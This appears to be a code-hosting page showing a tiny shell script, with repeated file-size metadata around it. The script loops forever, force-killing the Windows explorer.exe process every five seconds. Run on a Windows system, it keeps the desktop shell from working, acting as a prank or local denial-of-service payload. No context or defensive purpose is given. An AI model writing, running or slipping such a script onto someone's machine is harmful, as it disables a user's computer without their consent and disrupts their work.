7 lines
65 B
Bash
7 lines
65 B
Bash
|
#!/bin/sh
|
||
|
|
||
|
while true; do
|
||
|
killall -9 explorer.exe
|
||
|
sleep 5
|
||
|
done
|